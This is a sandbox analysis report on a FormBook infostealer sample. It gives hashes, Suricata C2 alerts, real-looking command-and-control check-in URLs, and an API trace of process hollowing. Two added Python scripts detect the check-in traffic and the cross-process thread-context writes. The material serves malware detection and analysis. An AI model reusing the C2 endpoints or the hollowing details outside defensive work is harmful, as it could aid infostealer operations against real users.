Summary | ZeroBOX

vbc.exe

Tags: Malicious Library, UPX, PE32, PE File
Category FILE
Machine s1_win7_x6403_us
Started March 29, 2023, 10:34 a.m.
Completed March 29, 2023, 10:37 a.m.
Size 293.1KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 7c85964484c4e3471124dd4dd5ef34df
SHA256 ab8fa0dda1daa490598653ad71df25b26af3dc5b54434c68bccdff3eda13f96e
CRC32 EE468DF7
ssdeep 6144:/Ya6ecZBUdAW0HmqIUjrBxEsjolC06nbGY9kbdVMZYIOS+Fgoka:/YQnd+GaLEsfnbGKkDax5+Vka
Yara
  • UPX_Zero - UPX packed file
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

IP Address Status Action
103.188.120.191 Active Moloch
164.124.101.2 Active Moloch
81.169.145.82 Active Moloch
85.15.189.140 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49168 -> 81.169.145.82:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 81.169.145.82:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 81.169.145.82:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 85.15.189.140:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 85.15.189.140:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 85.15.189.140:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 103.188.120.191:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 103.188.120.191:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 103.188.120.191:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx
(no arguments)
status 1, return 1, repeated 0
section .ndata
suspicious_features: GET method with no User-Agent header; suspicious_request: GET http://www.hyrxo.win/gn35/?_DKdKJa=Px4xbTIrKwyUbcbV7Sa4MFdwj6MuY8cQxHdgLkOTvjLt2qFRB4E1b+Ud0Zeqp82x10XYRgaJ&QZ3=ehux_8Xh401XOrt
suspicious_features: GET method with no User-Agent header; suspicious_request: GET http://www.1cweb.online/gn35/?_DKdKJa=GGTZroRoL1BXwM3MXiLpR9yEKm8KXFWUPJQo2rBdJCC/pgm2ifzqsBXvCGkh1lxdt+0GDl+4&QZ3=ehux_8Xh401XOrt
suspicious_features: GET method with no User-Agent header; suspicious_request: GET http://www.reinifix.net/gn35/?_DKdKJa=/oLJKsvMxImT2IdLjwC7RXLGQP6Il4Qvv7Du59jzs3EP6cW1xcwdDxVo3LxxLXdrTKNn2jpT&QZ3=ehux_8Xh401XOrt
request GET http://www.hyrxo.win/gn35/?_DKdKJa=Px4xbTIrKwyUbcbV7Sa4MFdwj6MuY8cQxHdgLkOTvjLt2qFRB4E1b+Ud0Zeqp82x10XYRgaJ&QZ3=ehux_8Xh401XOrt
request GET http://www.1cweb.online/gn35/?_DKdKJa=GGTZroRoL1BXwM3MXiLpR9yEKm8KXFWUPJQo2rBdJCC/pgm2ifzqsBXvCGkh1lxdt+0GDl+4&QZ3=ehux_8Xh401XOrt
request GET http://www.reinifix.net/gn35/?_DKdKJa=/oLJKsvMxImT2IdLjwC7RXLGQP6Il4Qvv7Du59jzs3EP6cW1xcwdDxVo3LxxLXdrTKNn2jpT&QZ3=ehux_8Xh401XOrt
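As an added example (my code, not part of the ZeroBOX report and not the logic of the ET signatures fired above), a small Python checker that applies the features the sandbox flagged on the check-ins to a constructed request log containing the three URLs above plus two unrelated requests: a GET with no User-Agent, a single short directory as the path, and a two-parameter query whose first value is a long base64-alphabet blob and whose second is a short tag. It then clusters hits by that second parameter, which is identical across all three domains here and therefore ties them into one campaign. The log format, regexes and thresholds are my assumptions, tuned to the report's URLs.

```python
import re
from urllib.parse import urlsplit

# Constructed sample log (not sandbox output): "<method> <url> ua=<User-Agent, or - if absent>".
# The first three lines are the check-in URLs from the report; the last two are benign filler.
SAMPLE_LOG = """\
GET http://www.hyrxo.win/gn35/?_DKdKJa=Px4xbTIrKwyUbcbV7Sa4MFdwj6MuY8cQxHdgLkOTvjLt2qFRB4E1b+Ud0Zeqp82x10XYRgaJ&QZ3=ehux_8Xh401XOrt ua=-
GET http://www.1cweb.online/gn35/?_DKdKJa=GGTZroRoL1BXwM3MXiLpR9yEKm8KXFWUPJQo2rBdJCC/pgm2ifzqsBXvCGkh1lxdt+0GDl+4&QZ3=ehux_8Xh401XOrt ua=-
GET http://www.reinifix.net/gn35/?_DKdKJa=/oLJKsvMxImT2IdLjwC7RXLGQP6Il4Qvv7Du59jzs3EP6cW1xcwdDxVo3LxxLXdrTKNn2jpT&QZ3=ehux_8Xh401XOrt ua=-
GET http://example.com/index.html ua=Mozilla/5.0
GET http://update.example.net/v2/?id=42&lang=en ua=-
"""

# Heuristic thresholds: assumptions tuned to the report's URLs, not the ET rule bodies.
PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")   # one short directory with trailing slash
BLOB_RE = re.compile(r"^[A-Za-z0-9+/=]{40,}$")  # long base64-alphabet value
TAG_RE = re.compile(r"^[A-Za-z0-9_]{4,32}$")    # short campaign-style tag


def parse_line(line):
    """Split one constructed log line into method, URL and optional User-Agent."""
    method, url, ua_field = line.split(" ", 2)
    ua = ua_field[len("ua="):]
    return {"method": method, "url": url, "user_agent": None if ua == "-" else ua}


def raw_query_params(query):
    """Split a query string without percent/plus decoding so '+' and '/' in the blob survive."""
    params = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            params.append((name, value))
    return params


def is_formbook_like(req):
    """True when the request shows the features the sandbox flagged on the C2 check-ins."""
    if req["method"] != "GET" or req["user_agent"] is not None:
        return False
    parts = urlsplit(req["url"])
    if not PATH_RE.match(parts.path):
        return False
    params = raw_query_params(parts.query)
    if len(params) != 2:
        return False
    (_, blob), (_, tag) = params
    return bool(BLOB_RE.match(blob) and TAG_RE.match(tag))


def scan(log_text):
    """Return one record per suspicious request: host, path and the second (tag) parameter."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        req = parse_line(line)
        if is_formbook_like(req):
            parts = urlsplit(req["url"])
            tag_name, tag_value = raw_query_params(parts.query)[1]
            hits.append({"host": parts.hostname, "path": parts.path, "tag": f"{tag_name}={tag_value}"})
    return hits


def cluster_by_tag(hits):
    """Group hit hosts by the shared tag: one tag value across several domains is one campaign."""
    clusters = {}
    for hit in hits:
        clusters.setdefault(hit["tag"], []).append(hit["host"])
    return clusters


if __name__ == "__main__":
    for tag, hosts in cluster_by_tag(scan(SAMPLE_LOG)).items():
        print(f"{tag}: {', '.join(hosts)}")
```

The blob is split by hand rather than with `parse_qsl` because URL decoding would turn the `+` characters in the first parameter into spaces and break the base64-alphabet check; the same care applies when you lift these URLs out of a proxy log.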
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01d50000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff (pseudo-handle for the calling process)
status 1, return 0, repeated 0

NtAllocateVirtualMemory

process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01d70000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff (pseudo-handle for the calling process)
status 1, return 0, repeated 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff (pseudo-handle for the calling process)
status 1, return 0, repeated 0
file C:\Users\test22\AppData\Local\Temp\gpphbrp.exe
file C:\Users\test22\AppData\Local\Temp\hwjgf.bat
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
status 1, return 1, repeated 0
Process injection: process 2132 called NtSetContextThread to modify a thread in remote process 2184. Rewriting another process's thread context is the hand-off step of process hollowing: on 32-bit Windows 7 the initial thread of a freshly created, suspended process starts with EAX holding the image entry point and EBX the PEB address, so the EAX value written below (4321744 = 0x41f1d0, inside a 0x00400000-based image) is where the hijacked thread runs once it is resumed. The SeDebugPrivilege lookup above is the usual preparation for obtaining a handle to another process.
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2005598660 (0x778b01c4)
registers.esp: 1638384 (0x0018fff0)
registers.edi: 0
registers.eax: 4321744 (0x0041f1d0)
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168 (0x7efde000)
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000f8
process_identifier: 2184
status 1, return 0, repeated 0
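As an added example (my code, not the sandbox's own detection logic), a Python correlation over a constructed event list modelled on the API trace above: it collects RWX allocations per PID, notes which PID looked up SeDebugPrivilege, and flags every NtSetContextThread whose target PID differs from the caller. The "caller" field is my assumption, filled in from the pseudo-handle for the allocations and from the process-injection summary line for the context write, because the extract does not carry a per-call caller PID. It also checks whether the new EAX lands inside an RWX region of the target; here it does not, which tells you the resume address is in the process's image range rather than in the fresh 3 MB allocation.

```python
PAGE_EXECUTE_READWRITE = 0x40
CURRENT_PROCESS = 0xFFFFFFFF  # NtCurrentProcess() pseudo-handle on 32-bit Windows

# Constructed event list (not raw sandbox output) with the values the report logs.
# "caller" is assumed: 2132 for its own allocations, 2184 for its own, and 2132 for the
# context write per the report's summary line.
EVENTS = [
    {"api": "NtAllocateVirtualMemory", "caller": 2132, "process_handle": CURRENT_PROCESS,
     "process_identifier": 2132, "base_address": 0x01D50000, "region_size": 8192, "protection": 64},
    {"api": "NtAllocateVirtualMemory", "caller": 2132, "process_handle": CURRENT_PROCESS,
     "process_identifier": 2132, "base_address": 0x01D70000, "region_size": 4096, "protection": 64},
    {"api": "NtAllocateVirtualMemory", "caller": 2184, "process_handle": CURRENT_PROCESS,
     "process_identifier": 2184, "base_address": 0x008F0000, "region_size": 3158016, "protection": 64},
    {"api": "LookupPrivilegeValueW", "caller": 2132, "privilege_name": "SeDebugPrivilege"},
    {"api": "NtSetContextThread", "caller": 2132, "process_identifier": 2184, "thread_handle": 0xF8,
     "registers": {"eip": 2005598660, "esp": 1638384, "eax": 4321744, "ebx": 2130567168}},
]


def rwx_regions(events):
    """Map PID -> list of (base, end) for every RWX allocation, whoever requested it."""
    regions = {}
    for e in events:
        if e["api"] == "NtAllocateVirtualMemory" and e["protection"] & PAGE_EXECUTE_READWRITE:
            base = e["base_address"]
            regions.setdefault(e["process_identifier"], []).append((base, base + e["region_size"]))
    return regions


def debug_privilege_callers(events):
    """PIDs that resolved SeDebugPrivilege, a common prelude to opening other processes."""
    return {e["caller"] for e in events
            if e["api"] == "LookupPrivilegeValueW" and e["privilege_name"] == "SeDebugPrivilege"}


def in_any(addr, ranges):
    return any(lo <= addr < hi for lo, hi in ranges)


def injection_candidates(events):
    """Flag each cross-process NtSetContextThread and attach the supporting evidence."""
    regions = rwx_regions(events)
    debuggers = debug_privilege_callers(events)
    out = []
    for e in events:
        if e["api"] != "NtSetContextThread" or e["process_identifier"] == e["caller"]:
            continue
        target = e["process_identifier"]
        regs = e["registers"]
        out.append({
            "caller": e["caller"],
            "target": target,
            "new_eip": regs["eip"],
            "new_eax": regs["eax"],
            "rwx_in_target": bool(regions.get(target)),
            "eax_in_target_rwx": in_any(regs["eax"], regions.get(target, [])),
            "caller_looked_up_sedebug": e["caller"] in debuggers,
        })
    return out


if __name__ == "__main__":
    for c in injection_candidates(EVENTS):
        print(f"pid {c['caller']} rewrote a thread context in pid {c['target']}: "
              f"eip=0x{c['new_eip']:08x} eax=0x{c['new_eax']:08x} "
              f"rwx_in_target={c['rwx_in_target']} eax_in_target_rwx={c['eax_in_target_rwx']} "
              f"sedebug={c['caller_looked_up_sedebug']}")
```

The self-allocated RWX regions alone are weak evidence (unpackers do the same); the cross-process context write is the event to alert on, and the other fields are there to rank the alert, not to gate it.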
Antivirus

Bkav W32.AIDetectNet.01
Lionic Trojan.Win32.Agent.tshg
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.66137268
FireEye Generic.mg.7c85964484c4e347
McAfee Trojan-FUUG!7C85964484C4
VIPRE Gen:Variant.Nemesis.1797
Sangfor Suspicious.Win32.Save.ins
CrowdStrike win/malicious_confidence_100% (W)
Alibaba TrojanSpy:Application/FormBook.cc0b7ef8
Arcabit Trojan.Nemesis.D705
Cyren W32/Injector.BIA.gen!Eldorado
Symantec Packed.NSISPacker!g14
ESET-NOD32 a variant of Win32/Injector.ESVA
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.Win32.Strab.gen
BitDefender Trojan.GenericKD.66137268
Avast Win32:PWSX-gen [Trj]
Emsisoft Trojan.GenericKD.66137268 (B)
TrendMicro TROJ_GEN.R002C0PCS23
McAfee-GW-Edition BehavesLike.Win32.Generic.dc
Trapmine malicious.moderate.ml.score
Sophos Generic ML PUA (PUA)
SentinelOne Static AI - Suspicious PE
Webroot W32.Infostealer.Formbook
Avira HEUR/AGEN.1337962
MAX malware (ai score=80)
Xcitium Malware@#1o9i3f53oc15z
Microsoft Trojan:Script/Phonzy.C!ml
GData Win32.Trojan.Agent.YY782N
Google Detected
AhnLab-V3 Trojan/Win.Agent.C5382526
ALYac Gen:Variant.Nemesis.1797
Cylance unsafe
TrendMicro-HouseCall TROJ_GEN.R002C0PCS23
Rising Trojan.Nsisinject!8.11178 (TFE:5:Y2laFjB9pNF)
Ikarus Trojan-Spy.FormBook
Fortinet W32/ShellcodeRunner.CA!tr
AVG Win32:PWSX-gen [Trj]